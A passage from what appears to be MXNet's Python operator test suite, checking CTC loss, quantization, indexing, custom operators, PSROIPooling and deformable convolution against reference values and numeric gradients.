labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
    outTest = exe.outputs[0].copy()  # copy so the next forward() does not overwrite it
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest.asnumpy(), outTrain.asnumpy())
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest.asnumpy(), loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
check_ctc_loss(acts, labels, true_loss)
check_contrib_ctc_loss(acts, labels, true_loss)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
check_ctc_loss(acts2, labels2, true_loss)
check_contrib_ctc_loss(acts2, labels2, true_loss)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
check_ctc_loss(acts2, labels3, true_loss)
check_contrib_ctc_loss(acts2, labels3, true_loss)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss.asnumpy(), expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label): # from tf
vocab_size = 5
max_label_len = 5
        padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss_grad(blank_label): # from tf
vocab_size = 5
max_label_len = 5
        padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)
check_ctc_loss_grad('first')
check_ctc_loss_grad('last')
check_contrib_ctc_loss_grad('first')
check_contrib_ctc_loss_grad('last')
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
assert same(qa.asnumpy(), qa_real.asnumpy())
assert same(a_.asnumpy(), a_real.asnumpy())
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
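# index_copy writes the rows of t into x at the positions given by index; x therefore only
# receives gradient on the rows it keeps, while t receives an all-ones gradient.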
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
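# boolean_mask keeps the rows of data where index is non-zero; its backward scatters the
# output gradient back into those rows and leaves the masked-out rows at zero.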
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output.asnumpy(), expected_output.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(x2.grad.asnumpy(), expected_grad.asnumpy(), rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of the default implementation of
# storage type inference in custom operators
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs.asnumpy(), lhs.grad.asnumpy(), rtol=rtol, atol=atol)
assert_almost_equal(lhs.asnumpy(), rhs.grad.asnumpy(), rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x.asnumpy(), np.ones(shape=(10, 10), dtype=np.float32))
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
if not sys.platform.startswith('win'): # no fork() on Windows
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive(), "deadlock may exist in custom operator"
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# Currently only a GPU implementation is available
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
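# The loop below re-draws any offset whose bilinear sampling locations fall within 1e-3 of an
# integer grid point, since the gradient is not well defined there and would break the numeric
# gradient check in test_deformable_psroipooling.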
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condition holds, the sampling location is not differentiable,
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points the bilinear interpolation function may be non-differentiable;
# to avoid this, we check whether the sampling locations fall on valid points and resample otherwise
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# Currently only a GPU implementation is available
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
